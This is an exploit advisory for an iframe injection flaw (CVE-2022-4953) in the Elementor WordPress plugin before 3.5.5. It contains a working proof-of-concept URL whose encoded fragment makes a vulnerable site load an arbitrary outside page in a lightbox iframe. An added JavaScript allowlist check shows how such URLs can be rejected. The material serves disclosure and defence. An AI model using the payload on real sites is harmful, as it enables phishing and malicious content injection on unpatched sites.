WordPress Elementor Iframe Injection

WordPress Elementor plugin versions prior to 3.5.5 suffer from an iframe injection vulnerability.

Packet Storm
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953

# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.

# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
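The fragment format used by the PoC above, paired with the origin allowlist check that the advisory says the plugin lacked, as an added JavaScript example (not Elementor's own code; the allowed origins and the benign video URL are assumed):

```javascript
// Added example, not Elementor's code: parse an "#elementor-action:" fragment, decode its
// base64 JSON "settings", and accept a lightbox URL only if it is https and on an allowlist.
const ALLOWED_ORIGINS = new Set([            // assumed allowlist for this site (constructed)
  'https://vulnerable-site.tld',
  'https://www.youtube.com',
  'https://player.vimeo.com',
]);

// Works in the browser (atob/btoa) and in Node; the fallback only covers older Node versions.
const b64decode = (s) => (typeof atob === 'function' ? atob(s) : Buffer.from(s, 'base64').toString('binary'));
const b64encode = (s) => (typeof btoa === 'function' ? btoa(s) : Buffer.from(s, 'binary').toString('base64'));

// Returns { action, settings } or null when the fragment is absent, malformed, or not JSON.
function parseElementorAction(hash) {
  const prefix = '#elementor-action:';
  if (typeof hash !== 'string' || !hash.startsWith(prefix)) return null;
  const params = new URLSearchParams(hash.slice(prefix.length));
  const action = params.get('action');
  let settingsB64 = params.get('settings');
  if (!action || !settingsB64) return null;
  settingsB64 = settingsB64.replace(/ /g, '+');   // '+' in a query string decodes to a space
  try {
    return { action, settings: JSON.parse(b64decode(settingsB64)) };
  } catch {
    return null;                                   // invalid base64 or invalid JSON
  }
}

// Only https URLs on allowed origins may be loaded; this also rejects javascript:, data:, http: and unparseable values.
function isAllowedLightboxUrl(rawUrl, allowedOrigins = ALLOWED_ORIGINS) {
  let url;
  try { url = new URL(rawUrl); } catch { return false; }
  return url.protocol === 'https:' && allowedOrigins.has(url.origin);
}

// The URL a hardened lightbox handler would hand to the iframe, or null to refuse the request.
function safeLightboxTarget(hash, allowedOrigins = ALLOWED_ORIGINS) {
  const parsed = parseElementorAction(hash);
  if (!parsed || parsed.action !== 'lightbox' || !parsed.settings) return null;
  const { type, url } = parsed.settings;
  if (type !== 'video' || typeof url !== 'string') return null;
  return isAllowedLightboxUrl(url, allowedOrigins) ? url : null;
}

// Sample inputs: the fragment from the advisory's PoC, and a constructed benign one.
const POC_HASH = '#elementor-action:action=lightbox&settings=' +
  'eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K';
const BENIGN_HASH = '#elementor-action:action=lightbox&settings=' +
  b64encode(JSON.stringify({ type: 'video', url: 'https://www.youtube.com/embed/abc123' }));
```

Calling `safeLightboxTarget(POC_HASH)` returns null because the decoded settings point at an origin outside the allowlist, while `safeLightboxTarget(BENIGN_HASH)` returns the embedded YouTube URL.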

Related news

CVE-2022-4953

The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.
